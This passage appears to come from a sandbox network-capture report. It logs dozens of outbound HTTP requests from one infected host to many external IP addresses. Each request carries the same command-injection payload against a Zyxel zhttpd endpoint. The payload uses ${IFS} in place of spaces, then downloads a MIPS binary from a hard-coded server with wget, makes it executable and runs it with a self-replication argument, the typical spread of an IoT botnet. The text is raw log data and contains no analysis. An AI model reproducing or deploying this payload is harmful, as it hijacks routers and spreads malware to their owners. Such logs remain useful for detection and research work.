                                                      Feb 2, 2024 06:35:43.423469067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2026192.168.2.1435606128.214.76.225443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:43.423492908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2027192.168.2.144264883.31.245.27443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:43.423558950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2028192.168.2.145939479.218.68.252443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:43.423579931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2029192.168.2.143726244.223.119.123443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:43.423628092 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2030192.168.2.1457764145.230.8.95443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:43.423640013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2031192.168.2.1445610210.133.140.11443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:43.423692942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2032192.168.2.144306499.95.206.224443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:43.423757076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2033192.168.2.1444246217.201.24.119443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:43.423774958 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2034192.168.2.1452318207.102.144.69443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:43.423815012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2035192.168.2.1445694194.158.107.102443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:43.423852921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2036192.168.2.1443862183.223.248.73443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:43.423885107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2037192.168.2.143395214.105.101.128443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:43.423943043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2038192.168.2.1448648218.154.116.109443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:43.423985958 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2039192.168.2.1459192139.31.11.103443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:43.424055099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2040192.168.2.1436634108.200.77.8443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:43.424076080 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2041192.168.2.144288264.116.84.145443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:43.424104929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2042192.168.2.1434206192.164.177.25443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:43.424149990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2043192.168.2.1457096134.193.39.15443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:43.424211979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2044192.168.2.143443867.10.241.211443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:43.424247980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2045192.168.2.1451536207.67.245.169443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:43.424292088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2046192.168.2.145071096.141.210.54443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:43.424324036 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2047192.168.2.1453216107.109.167.36443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:43.424364090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2048192.168.2.144798065.117.7.214443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:43.424470901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2049192.168.2.143964819.185.17.195443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:43.424519062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2050192.168.2.1446594220.155.150.115443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:43.424519062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2051192.168.2.143876062.236.152.116443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:43.424611092 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2052192.168.2.144670067.241.187.159443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:43.424617052 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2053192.168.2.145379252.215.133.153443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:43.424679995 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2054192.168.2.1433658133.197.180.83443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:43.424684048 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2055192.168.2.1450874220.195.3.252443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:43.424705982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2056192.168.2.143872625.205.182.74443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:43.424707890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2057192.168.2.1445742194.69.173.228443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:43.424787998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2058192.168.2.1455640121.130.219.17443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:43.424825907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2059192.168.2.1443988119.211.119.101443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:43.424844027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2060192.168.2.1451754103.98.203.251443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:43.424916029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2061192.168.2.144820858.228.32.159443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:43.424928904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2062192.168.2.1440674209.60.243.251443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:43.425002098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2063192.168.2.1440306198.23.223.156443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:43.425029039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2064192.168.2.145935820.90.26.250443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:43.425045013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2065192.168.2.1434164162.41.53.84443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:43.425102949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2066192.168.2.1452948173.158.196.218443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:43.425139904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2067192.168.2.1451980141.31.81.5443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:43.425204992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2068192.168.2.143844219.199.217.148443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:43.425261021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2069192.168.2.1451676132.180.197.200443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:43.425266027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2070192.168.2.1439136139.177.160.67443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:43.425270081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2071192.168.2.1436232198.132.13.72443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:43.425282955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2072192.168.2.145022642.231.81.207443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:43.425318003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2073192.168.2.1443164186.26.14.223443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:43.425348043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2074192.168.2.145977853.32.125.126443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:43.425410986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2075192.168.2.1451882108.158.240.11443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:43.425457954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2076192.168.2.145744213.172.202.29443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:43.425492048 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2077192.168.2.144335042.24.17.17443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:43.425555944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2078192.168.2.1439762122.148.8.76443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:43.425580978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2079192.168.2.1448986166.172.106.144443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:43.425658941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2080192.168.2.1439736165.170.251.40443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:43.425693035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2081192.168.2.144512089.130.173.253443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:43.425729990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2082192.168.2.1434654207.254.50.111443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:43.425746918 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2083192.168.2.1458902112.112.222.43443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:43.425781012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2084192.168.2.1451136120.63.36.186443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:43.425844908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2085192.168.2.1433760137.74.236.150443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:43.425898075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2086192.168.2.144034658.136.167.112443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:43.425913095 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2087192.168.2.1457476152.227.245.133443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:43.425923109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2088192.168.2.1447254206.25.156.174443
                                                      TimestampBytes transferredDirectionData
